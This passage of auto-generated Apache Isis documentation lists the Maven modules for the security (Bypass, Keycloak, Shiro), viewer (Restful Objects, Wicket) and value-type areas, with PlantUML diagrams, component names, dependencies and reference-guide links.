Bypass\n\n[plantuml,Bypass,svg]\n----\n@startuml(id=Bypass)\ntitle Bypass - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Bypass\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Bypass\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Bypass)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Bypass\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-bypass\nType: jar\nDirectory: \/security\/bypass\n----\n|.Components\n****\no.a.i.security.bypass.authentication.AuthenticatorBypass +\no.a.i.security.bypass.authorization.AuthorizorBypass +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/bypass\/IsisModuleSecurityBypass.adoc[IsisModuleSecurityBypass], xref:refguide:security:index\/bypass\/authentication\/AuthenticatorBypass.adoc[AuthenticatorBypass], xref:refguide:security:index\/bypass\/authorization\/AuthorizorBypass.adoc[AuthorizorBypass]\n****\n|===\n\n=== Keycloak\n\n[plantuml,Keycloak,svg]\n----\n@startuml(id=Keycloak)\ntitle Keycloak - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Keycloak\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Keycloak\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Keycloak)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Keycloak\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-keycloak\nType: jar\nDirectory: \/security\/keycloak\n----\n|Authentication and Authorization using Keycloak\n\n.Components\n****\no.a.i.security.keycloak.authentication.AuthenticatorKeycloak +\no.a.i.security.keycloak.webmodule.WebModuleKeycloak +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/keycloak\/IsisModuleSecurityKeycloak.adoc[IsisModuleSecurityKeycloak], xref:refguide:security:index\/keycloak\/authentication\/AuthenticatorKeycloak.adoc[AuthenticatorKeycloak], xref:refguide:security:index\/keycloak\/webmodule\/KeycloakFilter.adoc[KeycloakFilter], xref:refguide:security:index\/keycloak\/webmodule\/WebModuleKeycloak.adoc[WebModuleKeycloak]\n****\n|===\n\n=== Shiro\n\n[plantuml,Shiro,svg]\n----\n@startuml(id=Shiro)\ntitle Shiro - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage 
\"Shiro\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Shiro\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Shiro)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Shiro\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-shiro\nType: jar\nDirectory: \/security\/shiro\n----\n|Authentication and Authorization using Apache Shiro.\n\n.Components\n****\no.a.i.security.shiro.authentication.AuthenticatorShiro +\no.a.i.security.shiro.authorization.AuthorizorShiro +\no.a.i.security.shiro.webmodule.WebModuleShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.shiro:shiro-core:jar:<managed> +\norg.apache.shiro:shiro-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/shiro\/IsisModuleSecurityShiro.adoc[IsisModuleSecurityShiro], xref:refguide:security:index\/shiro\/authentication\/AuthenticatorShiro.adoc[AuthenticatorShiro], xref:refguide:security:index\/shiro\/authorization\/AuthorizorShiro.adoc[AuthorizorShiro], xref:refguide:security:index\/shiro\/authorization\/IsisPermission.adoc[IsisPermission], xref:refguide:security:index\/shiro\/authorization\/IsisPermissionResolver.adoc[IsisPermissionResolver], xref:refguide:security:index\/shiro\/webmodule\/WebModuleShiro.adoc[WebModuleShiro]\n****\n|===\n\n== Viewer\n\n[plantuml,Viewer,svg]\n----\n@startuml(id=Viewer)\ntitle Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Common Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Common Model\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-common\nType: jar\nDirectory: \/viewers\/common\n----\n|.Components\n****\no.a.i.viewer.common.model.branding.BrandingUiModelProvider +\no.a.i.viewer.common.model.header.HeaderUiModelProvider +\no.a.i.viewer.common.model.menu.MenuUiModelProvider +\no.a.i.viewer.common.model.userprofile.UserProfileUiModelProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.webjars:font-awesome:jar:5.15.2 +\n****\n|===\n\n=== Restful Objects\n\n[plantuml,Restful Objects,svg]\n----\n@startuml(id=Restful_Objects)\ntitle Restful Objects - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor 
#2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Restful Objects\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - RO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - RO (AppLib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - RO (JAX-RS Resteasy v4)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - RO (Rendering)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Viewer - RO (Testing)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Viewer - RO (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Restful Objects)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - RO\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects\nType: pom\nDirectory: \/viewers\/restfulobjects\n----\n|\n\n|Apache Isis Viewer - RO (AppLib)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-applib\nType: jar\nDirectory: \/viewers\/restfulobjects\/applib\n----\n|.Dependencies\n****\ncom.fasterxml.jackson.core:jackson-databind:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/applib\/IsisModuleViewerRestfulObjectsApplib.adoc[IsisModuleViewerRestfulObjectsApplib], xref:refguide:viewer:index\/restfulobjects\/applib\/JsonRepresentation.adoc[JsonRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/LinkRepresentation.adoc[LinkRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/Rel.adoc[Rel], xref:refguide:viewer:index\/restfulobjects\/applib\/RelDefinition.adoc[RelDefinition], xref:refguide:viewer:index\/restfulobjects\/applib\/RepresentationType.adoc[RepresentationType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulHttpMethod.adoc[RestfulHttpMethod], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulMediaType.adoc[RestfulMediaType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulRequest.adoc[RestfulRequest], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulResponse.adoc[RestfulResponse], xref:refguide:viewer:index\/restfulobjects\/applib\/boot\/BootstrapResource.adoc[BootstrapResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/AbstractObjectMemberRepresentation.adoc[AbstractObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ActionResultRepresentation.adoc[ActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectMemberRepresentation.adoc[DomainObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectRepresentation.adoc[DomainObjectRepresentation], 
xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectResource.adoc[DomainObjectResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainRepresentation.adoc[DomainRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainServiceResource.adoc[DomainServiceResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ListRepresentation.adoc[ListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectActionRepresentation.adoc[ObjectActionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectCollectionRepresentation.adoc[ObjectCollectionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectPropertyRepresentation.adoc[ObjectPropertyRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ScalarValueRepresentation.adoc[ScalarValueRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/AbstractTypeMemberRepresentation.adoc[AbstractTypeMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionDescriptionRepresentation.adoc[ActionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionParameterDescriptionRepresentation.adoc[ActionParameterDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/CollectionDescriptionRepresentation.adoc[CollectionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeRepresentation.adoc[DomainTypeRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeResource.adoc[DomainTypeResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/PropertyDescriptionRepresentation.adoc[PropertyDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeActionResultRepresentation.adoc[TypeActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeListRepresentation.adoc[TypeListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/dtos\/ScalarValueDtoV2.adoc[ScalarValueDtoV2], xref:refguide:viewer:index\/restfulobjects\/applib\/errors\/ErrorRepresentation.adoc[ErrorRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthRepresentation.adoc[HealthRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthResource.adoc[HealthResource], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageRepresentation.adoc[HomePageRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageResource.adoc[HomePageResource], xref:refguide:viewer:index\/restfulobjects\/applib\/menubars\/MenuBarsResource.adoc[MenuBarsResource], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserRepresentation.adoc[UserRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserResource.adoc[UserResource], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonMapper.adoc[JsonMapper], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonNodeUtils.adoc[JsonNodeUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/MediaTypes.adoc[MediaTypes], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/Parser.adoc[Parser], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/PathNode.adoc[PathNode], 
xref:refguide:viewer:index\/restfulobjects\/applib\/util\/UrlEncodingUtils.adoc[UrlEncodingUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionRepresentation.adoc[VersionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionResource.adoc[VersionResource]\n****\n\n|Apache Isis Viewer - RO (JAX-RS Resteasy v4)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-jaxrsresteasy4\nType: jar\nDirectory: \/viewers\/restfulobjects\/jaxrs-resteasy-4\n----\n|JAX-RS plugin using JBoss RESTEasy.\n\n.Components\n****\no.a.i.viewer.restfulobjects.jaxrsresteasy4.conneg.RestfulObjectsJaxbWriterForXml +\no.a.i.viewer.restfulobjects.jaxrsresteasy4.webmodule.WebModuleJaxrsResteasy4 +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-testing:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jboss.resteasy:resteasy-jaxb-provider:jar:<managed> +\norg.jboss.resteasy:resteasy-spring-boot-starter:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/IsisModuleViewerRestfulObjectsJaxrsResteasy4.adoc[IsisModuleViewerRestfulObjectsJaxrsResteasy4], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/conneg\/RestfulObjectsJaxbWriterForXml.adoc[RestfulObjectsJaxbWriterForXml], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/webmodule\/WebModuleJaxrsResteasy4.adoc[WebModuleJaxrsResteasy4]\n****\n\n|Apache Isis Viewer - RO (Rendering)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-rendering\nType: jar\nDirectory: \/viewers\/restfulobjects\/rendering\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.rendering.domainobjects.JsonValueEncoder +\no.a.i.viewer.restfulobjects.rendering.service.RepresentationService +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$RequestFilter +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$ResponseFilter +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceForRestfulObjectsV1_0 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV1 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV2 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceXRoDomainType +\no.a.i.viewer.restfulobjects.rendering.service.swagger.SwaggerServiceDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ClassExcluderDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.SwaggerSpecGenerator +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.TaggerDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ValuePropertyFactoryDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/rendering\/IResourceContext.adoc[IResourceContext], 
xref:refguide:viewer:index\/restfulobjects\/rendering\/IsisModuleRestfulObjectsRendering.adoc[IsisModuleRestfulObjectsRendering], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/RepresentationService.adoc[RepresentationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/acceptheader\/AcceptHeaderServiceForRest.adoc[AcceptHeaderServiceForRest], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationService.adoc[ContentNegotiationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceAbstract.adoc[ContentNegotiationServiceAbstract], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceForRestfulObjectsV1_0.adoc[ContentNegotiationServiceForRestfulObjectsV1_0], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV1.adoc[ContentNegotiationServiceOrgApacheIsisV1], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV2.adoc[ContentNegotiationServiceOrgApacheIsisV2], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceXRoDomainType.adoc[ContentNegotiationServiceXRoDomainType], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/swagger\/SwaggerServiceMenu.adoc[SwaggerServiceMenu]\n****\n\n|Apache Isis Viewer - RO (Testing)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-testing\nType: jar\nDirectory: \/viewers\/restfulobjects\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\n****\n\n|Apache Isis Viewer - RO (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-viewer\nType: jar\nDirectory: \/viewers\/restfulobjects\/viewer\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForObjectNotFound +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRestfulObjectsApplication +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRuntimeException +\no.a.i.viewer.restfulobjects.viewer.resources.DomainObjectResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainServiceResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainTypeResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.HomePageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.ImageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.MenuBarsResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.SwaggerSpecResource +\no.a.i.viewer.restfulobjects.viewer.resources.UserResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.VersionResourceServerside +\n****\n\n.Dependencies\n****\ncom.fasterxml.jackson.module:jackson-module-jaxb-annotations:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index 
Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/viewer\/IsisModuleViewerRestfulObjectsViewer.adoc[IsisModuleViewerRestfulObjectsViewer]\n****\n|===\n\n=== Wicket\n\n[plantuml,Wicket,svg]\n----\n@startuml(id=Wicket)\ntitle Wicket - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Wicket\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Wicket\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - Wicket (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - Wicket (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - Wicket (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Wicket)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Wicket\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket\nType: pom\nDirectory: \/viewers\/wicket\n----\n|\n\n|Apache Isis Viewer - Wicket (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-model\nType: jar\nDirectory: \/viewers\/wicket\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/model\/IsisModuleViewerWicketModel.adoc[IsisModuleViewerWicketModel]\n****\n\n|Apache Isis Viewer - Wicket (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-ui\nType: jar\nDirectory: \/viewers\/wicket\/ui\n----\n|.Components\n****\no.a.i.viewer.wicket.ui.app.logout.LogoutHandlerWkt +\no.a.i.viewer.wicket.ui.components.widgets.themepicker.IsisWicketThemeSupportDefault +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-extensions:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-themes:jar:<managed> +\nde.agilecoders.wicket.webjars:wicket-webjars:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-model:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-devutils:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.webjars:jquery-ui:jar:<managed> +\norg.webjars:select2:jar:<managed> 
+\norg.webjars.bower:summernote:jar:<managed> +\norg.wicketstuff:wicketstuff-select2:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/ui\/IsisModuleViewerWicketUi.adoc[IsisModuleViewerWicketUi]\n****\n\n|Apache Isis Viewer - Wicket (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-viewer\nType: jar\nDirectory: \/viewers\/wicket\/viewer\n----\n|.Components\n****\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistrarDefault +\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassListDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageNavigationServiceDefault +\no.a.i.viewer.wicket.viewer.services.BookmarkUiServiceWicket +\no.a.i.viewer.wicket.viewer.services.DeepLinkServiceWicket +\no.a.i.viewer.wicket.viewer.services.HintStoreUsingWicketSession +\no.a.i.viewer.wicket.viewer.services.ImageResourceCacheClassPath +\no.a.i.viewer.wicket.viewer.services.LocaleProviderWicket +\no.a.i.viewer.wicket.viewer.services.TranslationsResolverWicket +\no.a.i.viewer.wicket.viewer.services.WicketViewerSettingsDefault +\no.a.i.viewer.wicket.viewer.services.mementos.ObjectMementoServiceWicket +\no.a.i.viewer.wicket.viewer.webmodule.WebModuleWicket +\n****\n\n.Dependencies\n****\ncommons-io:commons-io:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nnet.ftlines.wicket-source:wicket-source:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/viewer\/IsisModuleViewerWicketViewer.adoc[IsisModuleViewerWicketViewer], xref:refguide:viewer:index\/wicket\/viewer\/mixins\/Object_clearHints.adoc[Object_clearHints]\n****\n|===\n\n== Valuetypes\n\n[plantuml,Valuetypes,svg]\n----\n@startuml(id=Valuetypes)\ntitle Valuetypes - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Valuetypes\\n[Software System]\" {\n rectangle \"==Apache Isis Val - SSE (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Server Sent Events\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Server Sent Events (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Server Sent Events (parent)\\n<size:10>[Container: 
